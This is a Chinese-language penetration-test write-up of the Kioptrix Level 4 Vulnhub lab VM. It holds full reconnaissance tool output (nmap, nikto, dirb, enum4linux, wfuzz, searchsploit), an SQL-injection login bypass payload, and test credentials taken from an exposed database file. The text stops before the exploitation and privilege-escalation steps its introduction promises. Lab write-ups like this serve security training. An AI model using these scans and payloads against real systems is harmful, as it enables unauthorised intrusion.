免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

---

前言

今日测试内容渗透Kioptrix Level #4靶机：

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞。本文介绍Kioptrix Level #4靶机渗透测试，内容包括主机扫描（nmap\netdiscover）、端口扫描（nmap\masscan）、目录扫描（dirb\dirsearch）、SQL注入、udf系统提权等内容。

Description
Back to the Top
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
   1a. It’s possible to remotely compromise the machine
   Stays within the target audience of this site
   Must be “realistic” (well kinda…)
   Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
   I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
   Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
   I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
   – A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.
   – Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
   Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
   Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
   So I hope you enjoy this one.
   The Kioptrix Team
   Source: http://www.kioptrix.com/blog/?p=604
   Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive

虚拟机之间再次存在很长的延迟，但这无济于事。 工作，家庭必须是第一位的。 博客和兴趣爱好排在列表的下方。 这些事情并不像人们想象的那么容易。 必须为这些挑战投入时间和一些计划，以确保：
1.可以远程获得root权限[编辑：对不起，我的意思不是]
1a. 可以远程破坏机器
1.停留在此网站的目标受众范围内
2.必须是“现实的”（好吧……）
3.应该为我复习。 无论是PHP还是MySQL用法等等。我已经有一段时间没做过了。
我也很难导出这个。 因此，请花时间阅读本文结尾处的评论。
秉承事物的精神，这一挑战与其他挑战有所不同，但仍处于轻松的境界。 我知道自己重复一遍，但必须始终清楚：这些VM是针对初学者的。 这是一个起点。
我很想编写一些小型的自定义应用程序，以供人们使用。 但我是管理员，不是编码员。 学习/编码这样的应用程序将花费太多时间。 并不是说我永远不会尝试做一个，但我不会屏住呼吸。 如果有人想要更艰巨的挑战，我敢肯定，Inter-tube会将他们抱在某个地方。 或者，您也可以随时注册Offsec的PWB课程。无耻的插头
– 我必须说几件事。 我使用新平台制作了这张图片。 希望一切正常，但我无法测试所有内容。 最初，VM在启动时很难获得IP。 由于某种原因，NIC无法启动，并且机器留有环回接口。 我希望我解决了这个问题。 如果这个启动需要一点时间，请不要感到惊讶。 它正在尝试获取IP。 有点耐心。 有人为我测试了映像，还报告说VM开机后就挂了。 重新启动后一切都很好。 只有一个人报告了此消息，因此希望这不是主要问题。 如果计划在vmFusion上运行它，则可能需要转换想象以适合您的融合版本。
– 还为使用Hyper-V的用户添加了VHD文件以供下载。 你们可能需要将网络适配器更改为“旧版网络适配器”。 我已经对该文件进行了测试，这个文件似乎对我来说还算不错…如果您遇到问题，或者由于某种原因它无法正常工作，请发送电子邮件comms [=]kioptrix.com
感谢www.n00bpentesting.com上的@shai_saint使用各种VM解决方案进行急需的测试。
感谢Hackfest.ca的Patrick也运行了VM并报告了一些问题。 Swappage和@Tallenz也这样做。 所有的帮助都是感激的家伙
所以我希望你喜欢这个。
Kioptrix团队
Note:只是一个虚拟硬盘。 您需要创建一个新的虚拟机并附加现有的硬盘驱动

---

一、环境配置

1.1 靶场信息

官方链接	[https://www.vulnhub.com/entry/kioptrix-level-13-4,25/)
发布日期	2012年2月8日
靶场大小	208MB
作者	Kioptrix
系列	Kioptrix
难度	★☆☆☆☆

1.2 靶场配置

• 渗透测试环境配置，请参考作者前面的内容vuInhub靶场实战系列-DC-2实战
• 【解决办法】- 靶机导入VMware后无法自动获取IP地址
• 建议将攻击机（kali）的网络模式设置为【桥接模式】
• VMware导入vmdk文件（亲测有效）

---

二、信息收集

2.1 主机发现

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.1.0/24Currently scanning: Finished!   |   Screen View: Unique Hosts                                                        5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                      _____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname      -----------------------------------------------------------------------------192.168.1.6     00:0c:29:41:10:00      1      60  VMware, Inc.                                                       192.168.1.13    ae:d5:7e:a8:51:6a      2     120  Unknown vendor                                                     192.168.1.1     a0:54:f9:b3:23:54      2     120  Unknown vendor  

2.1.2 arp-scan主机扫描

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.6	00:0c:29:41:10:00	VMware, Inc.
192.168.1.13	ae:d5:7e:a8:51:6a	(Unknown: locally administered)
192.168.1.8	22:cb:7f:9b:2c:c1	(Unknown: locally administered)3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded

综上所述的2种扫描方式，获得靶机信息
IP地址：192.168.1.11
MAC地址：00:0c:29:b2:d4:13

2.2 端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix4 192.168.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00028s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-06-12T16:34:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds

综上所述，获得靶机开放的端口信息：
22端口：ssh服务
80端口：http服务
139端口：netbios-ssn
445端口：netbios-ssn

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.1.6
WhatWeb report for http://192.168.1.6
Status    : 200 OK
Title     : <None>
IP        : 192.168.1.6
Country   : RESERVED, ZZSummary   : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version      : 2.2.8 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS           : Ubuntu LinuxString       : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)[ PHP ]PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version      : 5.2.4-2ubuntu5.6Module       : Suhosin-PatchVersion      : 5.2.4-2ubuntu5.6Google Dorks: (2)Website     : http://www.php.net/[ PasswordField ]find password fields String       : mypassword (from field name)[ X-Powered-By ]X-Powered-By HTTP header String       : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)HTTP Headers:HTTP/1.1 200 OKDate: Wed, 12 Jun 2024 20:38:05 GMTServer: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-PatchX-Powered-By: PHP/5.2.4-2ubuntu5.6Content-Length: 1255Connection: closeContent-Type: text/html

获得关键信息;

• Apache[2.2.8],
• HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch],
• PasswordField[mypassword],
• PHP[5.2.4-2ubuntu5.6][Suhosin-Patch],
• X-Powered-By[PHP/5.2.4-2ubuntu5.6]

2.4 目录扫描

2.4.1 dirb目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.6-----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Wed Jun 12 08:40:08 2024
URL_BASE: http://192.168.1.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.1.6/ ----
+ http://192.168.1.6/cgi-bin/ (CODE:403|SIZE:326)                                                                                                                                                              
==> DIRECTORY: http://192.168.1.6/images/                                                                                                                                                                      
+ http://192.168.1.6/index (CODE:200|SIZE:1255)                                                                                                                                                                
+ http://192.168.1.6/index.php (CODE:200|SIZE:1255)                                                                                                                                                            
==> DIRECTORY: http://192.168.1.6/john/                                                                                                                                                                        
+ http://192.168.1.6/logout (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.1.6/member (CODE:302|SIZE:220)                                                                                                                                                                
+ http://192.168.1.6/server-status (CODE:403|SIZE:331)                                                                                                                                                         ---- Entering directory: http://192.168.1.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.1.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Wed Jun 12 08:40:33 2024
DOWNLOADED: 4612 - FOUND: 6

FOUND: 6，发现6个目录

• http://192.168.1.6/cgi-bin/
• http://192.168.1.6/index
• http://192.168.1.6/index.php
• http://192.168.1.6/logout
• http://192.168.1.6/member
• http://192.168.1.6/server-status

2.4.2 dirsearch目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.6 -e * -x 404,403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txtTarget: http://192.168.1.6/[08:40:50] Starting: 
[08:41:17] 200 -  109B  - /checklogin                                       
[08:41:17] 200 -  109B  - /checklogin.php                                   
[08:41:22] 200 -  298B  - /database.sql                                     
[08:41:33] 301 -  350B  - /images  ->  http://192.168.1.6/images/           
[08:41:33] 200 -  930B  - /images/                                          
[08:41:40] 302 -    0B  - /logout/  ->  index.php                           
[08:41:40] 302 -    0B  - /logout  ->  index.php                            
[08:41:42] 302 -  220B  - /member/  ->  index.php                           
[08:41:42] 302 -  220B  - /member  ->  index.php
[08:41:42] 302 -  220B  - /member/login  ->  index.php
[08:41:42] 302 -  220B  - /member/admin.asp  ->  index.php
[08:41:42] 302 -  220B  - /member/logon  ->  index.php
[08:41:42] 302 -  220B  - /member/login.rb  ->  index.php                   
[08:41:42] 302 -  220B  - /member/signin  ->  index.php                     
[08:41:42] 302 -  220B  - /member/login.html  ->  index.php                 
[08:41:42] 302 -  220B  - /member.php  ->  index.php                        
[08:41:42] 302 -  220B  - /member/login.jsp  ->  index.php                  
[08:41:42] 302 -  220B  - /member/login.asp  ->  index.php                  
[08:41:42] 302 -  220B  - /member/login.py  ->  index.php
[08:41:42] 302 -  220B  - /member/login.39772.zip  ->  index.php            Task Completed

测试结果显示,获得目录

2.5 漏洞切入点

2.5.1 访问首页

访问链接：

• http://192.168.1.6/
  
  payload测试：
• username:john
• password:1’ or ‘1’ =’ 1

2.5.2 nmap漏洞扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -A -v -sS -Pn -T4 --script=vuln 192.168.1.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:47
Completed NSE at 08:47, 10.01s elapsed
Initiating NSE at 08:47
Completed NSE at 08:47, 0.00s elapsed
Initiating ARP Ping Scan at 08:47
Scanning 192.168.1.6 [1 port]
Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:47
Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
Initiating SYN Stealth Scan at 08:47
Scanning 192.168.1.6 [1000 ports]
Discovered open port 22/tcp on 192.168.1.6
Discovered open port 139/tcp on 192.168.1.6
Discovered open port 445/tcp on 192.168.1.6
Discovered open port 80/tcp on 192.168.1.6
Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
Initiating Service scan at 08:47
Scanning 4 services on 192.168.1.6
Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.6
NSE: Script scanning 192.168.1.6.
Initiating NSE at 08:47
Completed NSE at 08:54, 362.52s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.09s elapsed
Nmap scan report for 192.168.1.6
Host is up (0.0010s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.6
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.6:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.1.6:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.1.6:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: falseTRACEROUTE
HOP RTT     ADDRESS
1   1.02 ms 192.168.1.6NSE: Script Post-scanning.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.04 secondsRaw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)

2.5.3 nikto漏洞扫描

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.6
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.6
+ Target Hostname:    192.168.1.6
+ Target Port:        80
+ Start Time:         2024-06-12 08:47:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb  4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /database.sql: Database SQL found.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 1 error(s) and 22 item(s) reported on remote host
+ End Time:           2024-06-12 08:48:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

/database.sql: Database SQL found.
发现数据库文件
访问数据库文件：

• http://192.168.1.6/database.sql
  
  发现用户：
• 用户名:john
• 密码：1234
  网页发现登录不了。

2.5.4 enum4linux漏洞扫描

┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168..1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024=========================================( Target Information )=========================================Target ........... 192.168..1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================[E] Can't find workgroup/domain================================( Nbtstat Information for 192.168..1.6 )================================Looking up status of 0.0.0.0
No reply from 0.0.0.0===================================( Session Check on 192.168..1.6 )===================================[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.1.6 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024=========================================( Target Information )=========================================Target ........... 192.168.1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none============================( Enumerating Workgroup/Domain on 192.168.1.6 )============================[+] Got domain/workgroup name: WORKGROUP================================( Nbtstat Information for 192.168.1.6 )================================Looking up status of 192.168.1.6KIOPTRIX4       <00> -         B <ACTIVE>  Workstation ServiceKIOPTRIX4       <03> -         B <ACTIVE>  Messenger ServiceKIOPTRIX4       <20> -         B <ACTIVE>  File Server Service..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master BrowserWORKGROUP       <1d> -         B <ACTIVE>  Master BrowserWORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service ElectionsWORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup NameMAC Address = 00-00-00-00-00-00====================================( Session Check on 192.168.1.6 )====================================[+] Server 192.168.1.6 allows sessions using username '', password ''=================================( Getting domain SID for 192.168.1.6 )=================================Domain Name: WORKGROUP
Domain Sid: (NULL SID)[+] Can't determine if host is part of domain or part of a workgroup===================================( OS information on 192.168.1.6 )===================================[E] Can't get OS info with smbclient[+] Got OS info for 192.168.1.6 from srvinfo: KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)platform_id     :	500os version      :	4.9server type     :	0x809a03========================================( Users on 192.168.1.6 )========================================index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]==================================( Share Enumeration on 192.168.1.6 )==================================Sharename       Type      Comment---------       ----      -------print$          Disk      Printer DriversIPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.Server               Comment---------            -------Workgroup            Master---------            -------WORKGROUP            KIOPTRIX4[+] Attempting to map shares on 192.168.1.6//192.168.1.6/print$	Mapping: DENIED Listing: N/A Writing: N/A[E] Can't understand response:NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.6/IPC$	Mapping: N/A Listing: N/A Writing: N/A============================( Password Policy Information for 192.168.1.6 )============================[+] Attaching to 192.168.1.6 using a NULL share[+] Trying protocol 139/SMB...[+] Found domain(s):[+] KIOPTRIX4[+] Builtin[+] Password Info for Domain: KIOPTRIX4[+] Minimum password length: 5[+] Password history length: None[+] Maximum password age: Not Set[+] Password Complexity Flags: 000000[+] Domain Refuse Password Change: 0[+] Domain Password Store Cleartext: 0[+] Domain Password Lockout Admins: 0[+] Domain Password No Clear Change: 0[+] Domain Password No Anon Change: 0[+] Domain Password Complex: 0[+] Minimum password age: None[+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None[+] Forced Log off Time: Not Set[+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 0=======================================( Groups on 192.168.1.6 )=======================================[+] Getting builtin groups:[+]  Getting builtin group memberships:[+]  Getting local groups:[+]  Getting local group memberships:[+]  Getting domain groups:[+]  Getting domain group memberships:===================( Users on 192.168.1.6 via RID cycling (RIDS: 500-550,1000-1050) )===================[I] Found new SID: 
S-1-5-21-2529228035-991147148-3991031631[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[I] Found new SID: 
S-1-5-32[+] Enumerating users using SID S-1-22-1 and logon username '', password ''S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)[+] Enumerating users using SID S-1-5-32 and logon username '', password ''S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)================================( Getting printer info for 192.168.1.6 )================================No printers returned.enum4linux complete on Wed Jun 12 08:56:26 2024

2.5.5 wfuzz模糊测试

┌──(root㉿kali)-[/home/kali]
└─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.1.6/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************Target: http://192.168.1.6/FUZZ
Total requests: 3024=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                        
=====================================================================000001629:   302        0 L      0 W        0 Ch        "logout"                                                                                                                                       
000001736:   302        1 L      22 W       220 Ch      "member"                                                                                                                                       
000002294:   301        9 L      31 W       350 Ch      "robert"                                                                                                                                       
000001458:   301        9 L      31 W       348 Ch      "john"                                                                                                                                         
000001350:   200        45 L     94 W       1255 Ch     "index"                                                                                                                                        
000001337:   301        9 L      31 W       350 Ch      "images"                                                                                                                                       
000000566:   403        10 L     33 W       326 Ch      "cgi-bin/"                                                                                                                                     Total time: 5.687175
Processed Requests: 3024
Filtered Requests: 3017
Requests/sec.: 531.7226

2.5.6 searchsploit搜索samba漏洞

┌──(root㉿kali)-[/home/kali]
└─# searchsploit samba 3.        
------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                         | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                           | unix/remote/22468.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                 | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb
